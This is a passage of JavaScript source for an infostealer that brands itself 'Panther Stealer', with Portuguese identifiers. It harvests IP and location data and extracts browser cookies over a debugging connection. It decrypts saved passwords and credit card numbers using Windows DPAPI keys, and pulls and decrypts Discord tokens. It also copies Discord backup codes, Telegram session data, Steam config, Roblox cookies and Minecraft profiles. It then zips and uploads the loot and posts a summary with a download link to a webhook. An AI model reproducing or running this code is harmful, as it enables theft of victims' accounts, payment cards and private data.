| } = connection || { 248 | org: '❌' 249 | } 250 | 251 | if (success) { 252 | outputFileSync( 253 | join( 254 | temp, 255 | `phanter-${process.env.USERNAME}`, 256 | 'System', 257 | 'ip.txt' 258 | ), `IP: ${ip}\nType: ${type}\nContinent: ${continent}\nCountry: ${country}\nCountry Code: ${country_code}\nRegion Code: ${region_code}\nCity: ${city}\nPostal: ${postal}\nOrg: ${org}` 259 | ) 260 | } 261 | 262 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 263 | 264 | const arquivos_navegador = new Array() 265 | const arquivos_discord = new Array() 266 | const arquivos_backup = new Array() 267 | 268 | for (const value of [ 269 | process.env.LOCALAPPDATA + '\\Google', 270 | process.env.LOCALAPPDATA + '\\Microsoft\\Edge', 271 | process.env.LOCALAPPDATA + '\\Yandex\\YandexBrowser', 272 | process.env.LOCALAPPDATA + '\\BraveSoftware', 273 | process.env.APPDATA + '\\Opera Software\\Opera Stable', 274 | process.env.APPDATA + '\\Opera Software\\Opera GX Stable', 275 | process.env.APPDATA + '\\discord', 276 | process.env.APPDATA + '\\discordptb', 277 | process.env.APPDATA + '\\discordcanary', 278 | process.env.APPDATA + '\\discorddevelopment', 279 | process.env.APPDATA + '\\Discord Bot Client', 280 | process.env.APPDATA + '\\lightcord', 281 | process.env.USERPROFILE + '\\Downloads', 282 | ]) { 283 | const encontrado = glob.globSync([ 284 | '**/Login Data', 285 | '**/Cookies', 286 | '**/History', 287 | '**/Web Data', 288 | '**/leveldb/*.ldb', 289 | '**/leveldb/*.log', 290 | '**/*discord_backup_codes*', 291 | '**/*Backup-codes*', 292 | ], { 293 | 'dot': true, 294 | 'cwd': value, 295 | 'absolute': true, 296 | 'suppressErrors': true, 297 | ignore: [ 298 | '**/Guest*/**', 299 | '**/System*/**' 300 | ] 301 | }) 302 | 303 | arquivos_navegador.push( 304 | ...encontrado 305 | .filter((file) => /Login Data|Cookies|History|Web Data/.test(basename(file))) 306 | .filter((file) => /Google|Edge|YandexBrowser|Brave-Browser|Opera Software/.test(file)) 307 | ) 308 | 309 | arquivos_discord.push( 310 | ...encontrado.filter((file) => /.ldb|.log/.test(file)) 311 | ) 312 | 313 | arquivos_backup.push( 314 | ...encontrado.filter((file) => /discord_backup_codes|Backup-codes/.test(file)) 315 | ) 316 | } 317 | 318 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 319 | 320 | const cookies_ = new Array() 321 | const history = new Array() 322 | const passwords = new Array() 323 | const creditcards = new Array() 324 | 325 | for (let i = 0; i < arquivos_navegador.length; i++) { 326 | const value_ = arquivos_navegador[i] 327 | const navegador = value_.split('/').slice(6, 7).join('') 328 | const exe = $exe(navegador) 329 | 330 | const userdata = value_.includes('Opera GX Stable') 331 | ? value_.split('Opera GX Stable')[0] + 'Opera GX Stable' 332 | : value_.includes('Opera Stable') 333 | ? value_.split('Opera Stable')[0] + 'Opera Stable' 334 | : value_.split('User Data')[0] + 'User Data' 335 | 336 | var perfil = value_.match(/User Data[\\/](.+?)(?=[\\/]|$)/) 337 | 338 | perfil = perfil 339 | ? perfil[1].trim() 340 | : value_.includes('Opera Stable') 341 | ? value_.split('/').slice(7, 8).join('') 342 | : 'Default' 343 | 344 | if (value_.endsWith('Cookies')) { 345 | if (!exe) { 346 | continue 347 | } 348 | 349 | const runnavegador = async (browser) => { 350 | try { 351 | const nave = await chromium.launchPersistentContext(userdata, { 352 | headless: true, 353 | executablePath: exe, 354 | viewport: { 355 | width: 100, 356 | height: 100 357 | }, 358 | args: [ 359 | '--remote-debugging-port=5555', 360 | ...browser === 'Opera GX Stable' ? [] : [ 361 | '--profile-directory=' + perfil 362 | ], 363 | '--disable-gpu', 364 | '--disable-software-rasterizer', 365 | '--disable-dev-shm-usage', 366 | '--disable-accelerated-2d-canvas', 367 | '--no-sandbox', 368 | '--disable-setuid-sandbox', 369 | '--disable-extensions', 370 | '--disable-component-extensions-with-background-pages', 371 | '--disable-default-apps', 372 | '--mute-audio', 373 | '--no-zygote', 374 | '--disable-backgrounding-occluded-windows', 375 | '--memory-pressure-off', 376 | '--force-low-power-gpu' 377 | ] 378 | }) 379 | 380 | return nave 381 | } catch (error) { 382 | console.log(error) 383 | if (String(error).includes('process did exit')) { 384 | var matar = kill(basename(exe)) 385 | if (matar) { 386 | return await runnavegador() 387 | } 388 | } 389 | 390 | return false 391 | } 392 | } 393 | 394 | const runbw = await runnavegador(navegador) 395 | 396 | if (!runbw) { 397 | continue 398 | } 399 | 400 | const run = await chromium.connectOverCDP('http://localhost:5555') 401 | const [page] = run.contexts()[0].pages() 402 | 403 | const client = await page.context().newCDPSession(page) 404 | await client.send('Network.enable') 405 | const extractcookies = await client.send('Network.getAllCookies') 406 | 407 | const cookies = [] 408 | 409 | if (extractcookies.cookies && !extractcookies.cookies.length) { 410 | await run.close() 411 | await runbw.close() 412 | continue 413 | } else { 414 | for (const cookie of extractcookies.cookies) { 415 | var { 416 | domain, 417 | expires, 418 | name, 419 | value 420 | } = cookie 421 | 422 | cookies.push(`${domain}\tTRUE\t/\tFALSE\t${Math.floor(expires)}\t${name}\t${value}`) 423 | cookies_.push(1) 424 | } 425 | } 426 | 427 | await run.close() 428 | await runbw.close() 429 | 430 | outputFileSync(join( 431 | temp, 432 | `phanter-${process.env.USERNAME}`, 433 | 'Browser', 434 | 'Cookies', 435 | `${navegador}-${perfil}-Cookies.txt` 436 | ), cookies.join('\n')) 437 | } else { 438 | const data = value_.includes('Login Data') ? { 439 | 'select': 'SELECT * FROM Logins', 440 | 'name': 'Password' 441 | } : value_.includes('History') ? { 442 | 'select': 'SELECT * FROM urls', 443 | 'name': 'History' 444 | } : value_.includes('Web Data') ? { 445 | 'select': 'SELECT * FROM credit_cards', 446 | 'name': 'Credit Card' 447 | } : null 448 | 449 | var key 450 | 451 | if (data['name'] === 'Password' || data['name'] === 'Credit Card') { 452 | try { 453 | key = glob.globSync('**/Local State', { 454 | 'dot': true, 455 | 'cwd': value_.split('/').slice(0, 7).join('/'), 456 | 'absolute': true, 457 | 'suppressErrors': true 458 | })?.[0] || null 459 | 460 | if (!key) { 461 | continue 462 | } 463 | 464 | key = readFileSync(key) 465 | key = Buffer.from(JSON.parse(key).os_crypt.encrypted_key, 'base64').slice(5) 466 | key = Dpapi.unprotectData(key, null, 'CurrentUser') 467 | } catch (error) { 468 | console.log(error) 469 | continue 470 | } 471 | } 472 | 473 | const joindb = () => { 474 | try { 475 | return new sqlite3(value_).prepare(data['select']).all() 476 | } catch (error) { 477 | console.log(error) 478 | if (String(error).includes('database is locked')) { 479 | var matar = kill(basename(value_)) 480 | if (matar) { 481 | return joindb() 482 | } 483 | } 484 | return false 485 | } 486 | } 487 | 488 | const db = joindb() 489 | 490 | if (!db) { 491 | continue 492 | } 493 | 494 | var content = '' 495 | 496 | for (const value of db) { 497 | if (data['name'] === 'Password') { 498 | const senha = decrypt(value['password_value'], key) 499 | if (senha) { 500 | content += `🔗 Url: ${value['origin_url']}\n🧑 User: ${value['username_value'] || '❌'}\n🔑 Password: ${senha}\n\n` 501 | passwords.push(1) 502 | } 503 | } else if (data['name'] === 'History') { 504 | content += `${value.url}\n` 505 | history.push(1) 506 | } else if (data['name'] === 'Credit Card') { 507 | const numero = decrypt(value['card_number_encrypted'], key) 508 | if (numero) { 509 | content += `🧑 Name: ${value['name_on_card']}\n💳 Number: ${numero}\n⌛ Expires: ${value['expiration_month'] ? (value['expiration_month'] < 10 ? `0${value['expiration_month']}` : value['expiration_month']) : '❌'}/${value['expiration_year'] ? value['expiration_year'] : '❌'}\n\n` 510 | creditcards.push(1) 511 | } 512 | } else { 513 | continue 514 | } 515 | } 516 | 517 | if (content) { 518 | outputFileSync(join( 519 | temp, 520 | `phanter-${process.env.USERNAME}`, 521 | 'Browser', 522 | data['name'], 523 | `${navegador}-${perfil}-${data['name']}.txt` 524 | ), content) 525 | } 526 | } 527 | } 528 | 529 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 530 | 531 | const tokens = [] 532 | 533 | const ENCRYPTED_EXP = new RegExp(/dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\']*/g) 534 | const NORMAL_EXP = new RegExp(/[\w-_]{24,26}\.[\w-_]{6}\.[\w-_]{25,110}|mfa\.[\w-]{84}|[\w-][\w-][\w-]{24}\.[\w-]{6}\.[\w-]{26,110}|[\w-]{24}\.[\w-]{6}\.[\w-]{38}/g) 535 | 536 | for await (const value of arquivos_discord) { 537 | let content 538 | 539 | try { 540 | content = readFileSync(value, 'utf-8') 541 | } catch (error) { 542 | continue 543 | } 544 | 545 | if (value.includes('cord')) { 546 | var key = glob.globSync('**/Local State', { 547 | 'dot': true, 548 | 'cwd': value.split('/').slice(0, 6).join('/'), 549 | 'absolute': true, 550 | 'suppressErrors': true 551 | })?.[0] ?? undefined 552 | 553 | if (!key) { 554 | continue 555 | } 556 | 557 | key = await readJSONSync(key, { 558 | encoding: 'utf-8', 559 | throws: false 560 | }) 561 | 562 | key = Buffer.from(key.os_crypt.encrypted_key, 'base64').slice(5) 563 | key = Dpapi.unprotectData(key, null, 'CurrentUser') 564 | 565 | const matches = content 566 | .match(ENCRYPTED_EXP) || [] 567 | matches.forEach(token => { 568 | token = decrypt(Buffer.from(token.split('dQw4w9WgXcQ:')[1], 'base64'), key) 569 | tokens.push(`Token: ${token} | File: ${value}`) 570 | }) 571 | } else { 572 | const matches = content 573 | .match(NORMAL_EXP) || [] 574 | matches.forEach(token => { 575 | tokens.push(`Token: ${token} | File: ${value}`) 576 | }) 577 | } 578 | } 579 | 580 | if (tokens) { 581 | outputFileSync(join( 582 | temp, 583 | `phanter-${process.env.USERNAME}`, 584 | 'Discord', 585 | 'Token.txt' 586 | ), tokens.join('\n')) 587 | } 588 | 589 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 590 | 591 | for (const value of arquivos_backup) { 592 | copySync(value, join( 593 | temp, 594 | `phanter-${process.env.USERNAME}`, 595 | 'Backup', 596 | basename(value) 597 | ), { 598 | errorOnExist: false, 599 | overwrite: true 600 | }) 601 | } 602 | 603 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 604 | 605 | var telegram = join( 606 | process.env.APPDATA, 607 | 'Telegram Desktop', 608 | 'tdata' 609 | ) 610 | 611 | if (existsSync(telegram)) { 612 | copySync(telegram, join( 613 | temp, 614 | `phanter-${process.env.USERNAME}`, 615 | 'Telegram' 616 | ), { 617 | errorOnExist: false, 618 | overwrite: true, 619 | filter: (src) => { 620 | if (![ 621 | 'emoji', 622 | 'user_data' 623 | ].some((value) => src.includes(value))) { 624 | return true 625 | } else { 626 | return false 627 | } 628 | } 629 | }) 630 | 631 | telegram = '✅' 632 | } else { 633 | telegram = '❌' 634 | } 635 | 636 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 637 | 638 | var steam = join( 639 | process.env['ProgramFiles(x86)'], 640 | 'Steam' 641 | ) 642 | 643 | if (existsSync(steam)) { 644 | copySync(steam, join( 645 | temp, 646 | `phanter-${process.env.USERNAME}`, 647 | 'Steam' 648 | ), { 649 | errorOnExist: false, 650 | overwrite: true, 651 | filter: (src, dest) => { 652 | if (src.includes('config')) { 653 | return true 654 | } else { 655 | return false 656 | } 657 | } 658 | }) 659 | 660 | steam = '✅' 661 | } 662 | else { 663 | steam = '❌' 664 | } 665 | 666 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 667 | 668 | var roblox = join( 669 | process.env.LOCALAPPDATA, 670 | 'Roblox', 671 | 'LocalStorage', 672 | 'RobloxCookies.dat' 673 | ) 674 | 675 | if (existsSync(roblox)) { 676 | roblox = readJSONSync(roblox, { 677 | encoding: 'utf-8', 678 | throws: false 679 | }) 680 | 681 | if (roblox?.['CookiesData']) { 682 | roblox = Buffer.from(roblox['CookiesData'], 'base64') 683 | try { 684 | roblox = Dpapi.unprotectData(roblox, null, 'CurrentUser') 685 | outputFileSync(join( 686 | temp, 687 | `phanter-${process.env.USERNAME}`, 688 | 'Roblox Client', 689 | 'Cookie.txt' 690 | ), roblox) 691 | 692 | roblox = '✅' 693 | } catch (error) { 694 | console.log(error) 695 | roblox = '❌' 696 | } 697 | } else { 698 | roblox = '❌' 699 | } 700 | } else { 701 | roblox = '❌' 702 | } 703 | 704 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 705 | 706 | var minecraft = join( 707 | process.env.APPDATA, 708 | '.minecraft', 709 | ) 710 | 711 | if (existsSync(minecraft)) { 712 | const arquivos = readdirSync(minecraft) 713 | 714 | for (const value of arquivos) { 715 | if (['profiles', 'usercache'].some(data => value.includes(data)) && value.endsWith('.json')) { 716 | copySync(join(minecraft, value), join( 717 | temp, 718 | `phanter-${process.env.USERNAME}`, 719 | 'Minecraft', 720 | value 721 | ), { 722 | errorOnExist: false, 723 | overwrite: true 724 | }) 725 | } 726 | } 727 | 728 | minecraft = '✅' 729 | } else { 730 | minecraft = '❌' 731 | } 732 | 733 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 734 | 735 | const zipfile = new zip() 736 | 737 | await Promise.all([ 738 | zipfile.addLocalFolder(join( 739 | temp, 740 | `phanter-${process.env.USERNAME}`, 741 | )), 742 | zipfile.writeZip(join( 743 | temp, 744 | `phanter-${process.env.USERNAME}.zip` 745 | )) 746 | ]) 747 | 748 | const upload = await phanter$upload(join( 749 | temp, 750 | `phanter-${process.env.USERNAME}.zip` 751 | )) 752 | 753 | /////////////////////////////////////////////////////////////////////////////////////////////////////////// 754 | 755 | const embed = new MessageBuilder() 756 | .setTitle('Panther Stealer') 757 | .setColor('#a83f95') 758 | .setAuthor(process.env.COMPUTERNAME, 'https://i.pinimg.com/564x/1e/d1/9b/1ed19bba596c8d8b46dd3c6e3893d877.jpg', 'https://github.com/PantherOwO') 759 | .addField('🌐 **Ip**', `\`\`\`${meip}\`\`\``, false) 760 | .addField('🎮 **Steam**', `\`\`\`${steam}\`\`\``, true) 761 | .addField('📱 **Telegram**', `\`\`\`${telegram}\`\`\``, true) 762 | .addField('⛏️ **Minecraft**', `\`\`\`${minecraft}\`\`\``, true) 763 | .addField('🎲 **Roblox**', `\`\`\`${roblox}\`\`\``, false) 764 | .addField('💾 **Backup**', `\`\`\`${arquivos_backup.length}\`\`\``, true) 765 | .addField('🔐 **Discord Token(s)**', `\`\`\`${tokens.length}\`\`\``, true) 766 | .addField('🔑 **Password(s)**', `\`\`\`${passwords.length}\`\`\``, false) 767 | .addField('🍪 **Cookie(s)**', `\`\`\`${cookies_.length}\`\`\``, true) 768 | .addField('📜 **History(s)**', `\`\`\`${history.length}\`\`\``, true) 769 | .addField('💳 **Credit Card(s)**', `\`\`\`${creditcards.length}\`\`\``, true) 770 | .addField('⬇️ **Download**', `[Click Here](${upload})`, false) 771 | .setThumbnail('https://i.pinimg.com/564x/19/f8/2f/19f82f9bfe1f76ec8b8415097152f85a.jpg') 772 | .setTimestamp() 773 | .setFooter(process.env.COMPUTERNAME, 'https://i.pinimg.com/564x/1e/d1/9b/1ed19bba596c8d8b46dd3c6e3893d877.jpg') 774 | 775 | await hook.send(embed) 776 | })() 777 | --------------------------------------------------------------------------------